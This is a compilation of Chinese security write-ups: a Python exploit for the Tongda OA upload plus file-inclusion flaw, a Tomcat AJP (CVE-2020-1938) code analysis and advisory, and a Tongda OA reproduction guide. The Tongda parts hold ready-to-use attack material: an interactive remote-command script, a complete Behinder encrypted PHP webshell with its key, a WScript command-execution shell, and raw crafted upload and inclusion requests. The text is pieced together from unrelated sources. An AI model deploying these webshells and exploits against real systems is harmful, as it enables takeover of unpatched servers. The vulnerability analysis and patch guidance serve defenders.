通达OA文件上传+文件包含漏洞 【POC+EXP练习计划2】
#因为路径要循环判断，所以看起来有点杂乱
#文件包含要加上Content-Type: application/x-www-form-urlencoded。但是上传不能用这个，所以弄了两个headers
#在同目录下要存在一个123.php ，  123.php是要上传的马
import requests
import re

headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3362.0 Safari/537.36'}

headers1 = {
           'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3362.0 Safari/537.36',
           'Content-Type':'application/x-www-form-urlencoded'
}
proxies = {'http':'http://127.0.0.1:8080'}

class Poc:
    def __init__(self,url,uploadUrl):
        self.url = url
        self.uploadUrl = self.url + uploadUrl
        self.includeUrl = None
        self.file = None
        self.cmd = 'echo H9_dawn'
        self.status = 0

    def upload(self):
        files = {'ATTACHMENT':('123.php.',open('123.php.','rb'),'image/png')}
        data = {'UPLOAD_MODE':2,'P':'123'}
        response = requests.post(self.uploadUrl,headers=headers,data=data,files=files)
        if 'OK' in str(response.content):
            return str(response.content)
        else :
            return 'No'

    def include(self):
        data = 'json={"url":"'+self.file+'"}&cmd='+self.cmd
        response = requests.post(self.includeUrl,headers=headers1,data=data)
        response = str(response.content)
        if "H9_dawn" in response:
            self.status = 1

    def rce(self):
        data = 'json={"url":"' + self.file + '"}&cmd=' + self.cmd
        response = requests.post(self.includeUrl, headers=headers1, data=data)
        response = str(response.content)
        print(response)


def zz(html):
    rere = re.compile('@(\d+)_|(\d+)\||([1-9a-z.]+)\.\|')
    dic1 = rere.findall(html)
    return dic1[0][0] + '/' + dic1[1][1] + '.' + dic1[2][2]

if __name__ == '__main__':
    logo = '''
            __    __    ___           
           |  |  |  |  / _ \          ____                      
           |  |__|  | | (_) |        |  _ \  __ ___      ___ __   
           |   __   |  \__, |        | | | |/ _` \ \ /\ / / '_ \ 
           |  |  |  |    / /         | |_| | (_| |\ V  V /| | | | 
           |__|  |__|   /_/   ______ |____/ \__,_| \_/\_/ |_| |_|
           '''
    print(logo)
    url = 'http://localhost'
    uploadUrl = '/ispirit/im/upload.php'
    includeUrl = ['/ispirit/interface/gateway.php', '/mac/gateway.php','/interface/gateway.php']
    includeDir = '/general/../../attach/im/'
    poc = Poc(url, uploadUrl)
    status = 0
    resp = poc.upload()
    if (resp == 'No'):
        print("上传失败")
    else:
        fileName = zz(resp)
        for i in includeUrl:
            poc.includeUrl = url + i
            poc.file = includeDir + fileName
            poc.include()
            if poc.status == 1:
                print("[+++]恭喜你，存在通达OA漏洞")
                status = 1
                break
        if status == 1:
            while (1):
                cmd = input("请输入你要执行的命令： ")
                poc.cmd = cmd
                poc.rce()
        else :
            print("[---]很遗憾，不存在通达OA漏洞")

CVE-2020-1938:Tomcat AJP文件包含漏洞分析
--
### 0x01 前言
最近这个漏洞特别的火，各大媒体都在报道，在第一时间进行复现过后，我就想着找个时间分析分析，但是看了老半天的代码也没找到漏洞的触发点，只是根据PoC确定了是由于ajp协议可以自定义request的某些属性值导致的漏洞，而且我翻源码也找到了ajp协议的逻辑代码。但是更进一步，就卡住了，不知道自定义属性怎么就导致了漏洞的产生~没办法，只有去看看别的师傅的分析文章，恍然大悟，原来经过我们自定义属性过后的request对象的后续处理依旧符合tomcat的处理流程，就是针对某个地址的请求会被预先设置好的servlet处理，而任意文件包含也就出现在这些servlet中。下面我们就来看下具体的代码吧
### 0x02 漏洞分析
在分析之前我们还需要了解一下ajp协议的作用。移步： https://blog.csdn.net/jeikerxiao/article/details/82745516
我翻了下tomcat的源码，发现ajp协议实现在下面这一堆源码里：
![](tomcat_ajp_lfi/ajp.png)
然后我把这几个文件都翻了一遍，确定了几个可疑的文件以及可疑的函数，那么怎么确定我们的怀疑是否正确呢？只有下断点，然后发送payload,看看是否能够触发断点23333。结合网上公开的poc
![](tomcat_ajp_lfi/poc.png)
可以看到是设置了几个属性的，而且name是req_attrubute,然后我就去ajp协议源码中去找对这些属性进行处理的部分，一顿操作猛如虎，反正就是反复的调试，最后确定到prepareRequest这个方法，而且这个方法中可以看到这么一段代码：
![](tomcat_ajp_lfi/req_attribute.png)
经过几次调试，最终确定这里就是设置request属性的地方了，但是设置了request属性过后，request对象又会怎么被处理呢？我就是一直卡在这里了，当然，后面看到师傅的文章，知道请求会发送到对应的servlet，如果我们请求的是一个jsp文件，根据tomcat的默认web.xml文件：
```xml
jsp
org.apache.jasper.servlet.JspServlet
fork
false
xpoweredBy
false
3
```
可以看到是被JspServlet处理了，会执行到JspServlet的service方法：
```java
public void service (HttpServletRequest request,
HttpServletResponse response)
throws ServletException, IOException {
//jspFile may be configured as an init-param for this servlet instance
String jspUri = jspFile;
if (jspUri == null) {
// JSP specified via  in  declaration and
// supplied through custom servlet container code
String jspFile = (String) request.getAttribute(Constants.JSP_FILE);
if (jspFile != null) {
jspUri = jspFile;
request.removeAttribute(Constants.JSP_FILE);
}
}
if (jspUri == null) {
/*
* Check to see if the requested JSP has been the target of a
* RequestDispatcher.include()
*/
jspUri = (String) request.getAttribute(
RequestDispatcher.INCLUDE_SERVLET_PATH);
if (jspUri != null) {
/*
* Requested JSP has been target of
* RequestDispatcher.include(). Its path is assembled from the
* relevant javax.servlet.include.* request attributes
*/
String pathInfo = (String) request.getAttribute(
RequestDispatcher.INCLUDE_PATH_INFO);
if (pathInfo != null) {
jspUri += pathInfo;
}
} else {
/*
* Requested JSP has not been the target of a
* RequestDispatcher.include(). Reconstruct its path from the
* request's getServletPath() and getPathInfo()
*/
jspUri = request.getServletPath();
String pathInfo = request.getPathInfo();
if (pathInfo != null) {
jspUri += pathInfo;
}
}
}
if (log.isDebugEnabled()) {
log.debug("JspEngine --> " + jspUri);
log.debug("\t     ServletPath: " + request.getServletPath());
log.debug("\t        PathInfo: " + request.getPathInfo());
log.debug("\t        RealPath: " + context.getRealPath(jspUri));
log.debug("\t      RequestURI: " + request.getRequestURI());
log.debug("\t     QueryString: " + request.getQueryString());
}
try {
boolean precompile = preCompile(request);
serviceJspFile(request, response, jspUri, precompile);
} catch (RuntimeException e) {
throw e;
} catch (ServletException e) {
throw e;
} catch (IOException e) {
throw e;
} catch (Throwable e) {
ExceptionUtils.handleThrowable(e);
throw new ServletException(e);
}
}
```
经过上面代码的处理，最终jspUri的值变成了`javax.servlet.include.servlet_path + javax.servlet.include.path_info`，而这两个属性的值都是我们可控的。然后jspUri传入了serviceJspFile方法，也就是把jspUri指定的文件当作jsp文件解析了，所以能够造成RCE。
![](tomcat_ajp_lfi/calc.png)
而如果我们构造一个请求普通文件的ajp请求，tomcat最终根据web.xml中的配置调用DefaultServlet处理，也会造成LFI漏洞。具体就不分析了
### 0x03 其他
参考： https://www.colabug.com/2020/0222/7029362/
这篇文章写的比较水，主要是能写的并不多，其实就是通过ajp协议向tomcat发送请求包是可以控制request对象的`javax.servlet.include.request_uri, javax.servlet.include.path_info, javax.servlet.include.servlet_path` 这三个关键属性，导致我们可以访问任意的文件。
阅读本文需要结合PoC，因为很多线索都在PoC中： https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py
一键复制
编辑
Web IDE
原始数据
按行查看
历史

	

Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目，由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持，最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现，Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定，而且免费，因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可，成为目前比较流行的Web 应用服务器。
国家信息安全漏洞共享平台CNVD于昨日发布了Apache Tomcat文件包含漏洞CNVD-2020-1048的威胁通告。该漏洞(CVE-2020-1938)是由于Tomcat AJP协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能，攻击者可进一步实现远程代码执行。目前，厂商已发布新版本完成漏洞修复，根据国内某空间测绘引擎的漏洞影响范围来看，是比较大的。
影响范围
受影响版本：
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
不受影响版本：
Apache Tomcat = 7.0.100
Apache Tomcat = 8.5.51
Apache Tomcat = 9.0.31
漏洞防护
官方升级
目前官方已在最新版本中修复了该漏洞，请受影响的用户尽快升级版本进行防护，官方下载链接：
版本号 下载地址
Apache Tomcat 7.0.100 http://tomcat.apache.org/download-70.cgi
Apache Tomcat 8.5.51 http://tomcat.apache.org/download-80.cgi
Apache Tomcat 9.0.31 http://tomcat.apache.org/download-90.cgi
其他防护措施
如果相关用户暂时无法进行版本升级，可根据自身情况采用下列防护措施。
若不需要使用Tomcat AJP协议，可直接关闭AJP Connector，或将其监听地址改为仅监听本机localhost。
具体操作：
(1)编辑 /conf/server.xml，找到如下行( 为 Tomcat 的工作目录)：
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443" />
(2)将此行注释掉(也可删掉该行)：

(3)保存后需重新启动Tomcat，规则方可生效。
若需使用Tomcat AJP协议，可根据使用版本配置协议属性设置认证凭证。
使用Tomcat 7和Tomcat 9的用户可为AJP Connector配置secret来设置AJP协议的认证凭证。例如(注意必须将YOUR_TOMCAT_AJP_SECRET更改为一个安全性高、无法被轻易猜解的值)：
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/>
使用Tomcat 8的用户可为AJP Connector配置requiredSecret来设置AJP协议的认证凭证。例如(注意必须将YOUR_TOMCAT_AJP_SECRET更改为一个安全性高、无法被轻易猜解的值)：
<Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS"requiredSecret="YOUR_TOMCAT_AJP_SECRET" />
漏洞复现
下载并搭建含漏洞版本Tomcat，这里略过
POC：
https://github.com/0nise/CVE-2020-1938
https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC
https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/
参考链接：
https://www.cnvd.org.cn/webinfo/show/5415
https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
https://tomcat.apache.org/tomcat-8.0-doc/config/ajp.html

目录

1.漏洞概述

2.影响范围

3.风险等级

4.漏洞复现

4.1.环境搭建

4.2.漏洞利用

（1）手工复现文件上传漏洞

（2）手工复现文件包含漏洞

（3）命令执行

（4）漏洞利用POC

5.漏洞分析

（1）文件上传漏洞分析

（2）文件包含漏洞分析

6.修复建议

 

1.漏洞概述

       2020年03月18日，360CERT监测发现通达OA官方在03月13日发布了针对勒索病毒事件的紧急更新。根据分析该事件是通达OA中存在的两枚漏洞(文件上传漏洞，文件包含漏洞)所导致。通达OA爆出的任意文件上传及任意文件包含漏洞，影响版本非常广，这两个漏洞结合可以获取shell权限。

 

 

2.影响范围

受影响版本：


通达OA 11v

通达OA 2013版

通达OA 2013增强版

通达OA 2015版

通达OA 2016版

通达OA 2017版


不受影响版本：


通达OA 11.7v

通达OA 2018版

通达OA 2019版


 

3.风险等级

       高危

 

4.漏洞复现

4.1.环境搭建

复现环境：通达OA 2017版

下载地址：https://www.tongda2000.com/download/down.php?VERSION=2017&code=

       下载exe安装包，直接安装即可。

 




 

4.2.漏洞利用

（1）手工复现文件上传漏洞

       登录找到任意一处文件上传位置，抓包改包，文件上传利用点：/ispirit/im/upload.php

全局设置页面上传：




 

写入冰蝎的PHP加密一句话

payload：

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //pass: rebeyond
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

 

构造Burp改包POC：

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.1.220:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Length: 688
Connection: close
Cookie: PHPSESSID=123456

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123456
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="shell.php."
Content-Type: test/plain

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //pass: rebeyond
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--





 

上传成功，但不在网站根目录webroot目录下

解决办法：附件管理页面修改附件保存路径

 



前提是得知道网站的绝对路径。

修改后再次重放发现的确上传到了：webroot\im\2009目录。

 



再次使用改包POC上传，冰蝎连接getshell：

 



 

（2）手工复现文件包含漏洞

文件包含利用点：/mac/gateway.php

payload：

<?php
$command=$_POST["cmd"];
$wsh = new COM("WScript.shell");
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

首先改包上传写入payload：

 




利用/mac/gateway.php构造文件包含：

json={"url":"/general/../im/2009/1733558098.shell.php"}&cmd=ipconfig



 

 

（3）命令执行

       文件上传和文件包含组合造成命令执行漏洞。

首先改包上传：

 



上传成功，并记住文件路径：/im/2009/1158795558.shell.php

利用上传的payload造成命令执行：

       修改文件路径再次调用cmd执行系统命令。

 




 

（4）漏洞利用POC

POC地址：https://github.com/wikiZ/tongda-exp-poc/

 

5.漏洞分析

（1）文件上传漏洞分析

        通达的PHP源码是经过加密的，需要先进行解密。

PHP解密网站：http://dezend.qiling.org/free.html

\ispirit\im\upload.php：

 



       如上代码，在if条件判断中，只要变量P的值不为空就进入会话页面"inc/session.php"。这里漏洞比较明显，只要构造变量P的值不为空就能绕过。

继续往下走：

 




上述代码中如果变量DEST_UID的为空或者等于0，均会返回"接收方ID无效"。

继续：

 



上述代码中，变量_FILES的值大于1，UPLOAD_MODE等于1时，会调用UPLOAD方法进行上传。这里也容易构造变量值进行绕过。

 

TongDA 2017版文件上传绕过要求：


1.变量P传参不为空；

2.参数DEST_UID不为空且大于0；

3.参数UPLOAD_MODE等于1、2或3。


 

（2）文件包含漏洞分析

/mac/gateway.php：

 




如上代码，在if语句中传入json参数，再使用foreach方法遍历传入json的值，如果参数key等于url，那么传入的json就会赋值给url，然后调用include_once函数进行文件包含。

 

6.修复建议

建议更新到相应的版本：


			
版本
			
			

			
更新包下载地址
			
		

			
V11版
			
			

			
http://cdndown.tongda2000.com/oa/security/2020_A1.11.3.exe
			
		

			
2017版
			
			

			
http://cdndown.tongda2000.com/oa/security/2020_A1.10.19.exe
			
		

			
2016版
			
			

			
http://cdndown.tongda2000.com/oa/security/2020_A1.9.13.exe
			
		

			
2015版
			
			

			
http://cdndown.tongda2000.com/oa/security/2020_A1.8.15.exe
			
		

			
2013增强版
			
			

			
http://cdndown.tongda2000.com/oa/security/2020_A1.7.25.exe
			
		

			
2013版
			
			

			
http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe
			
		
                                           通达官网公告：https://www.tongda2000.com/news/p673.php

                                           参考文章：http://xisewbms.cn/?post=179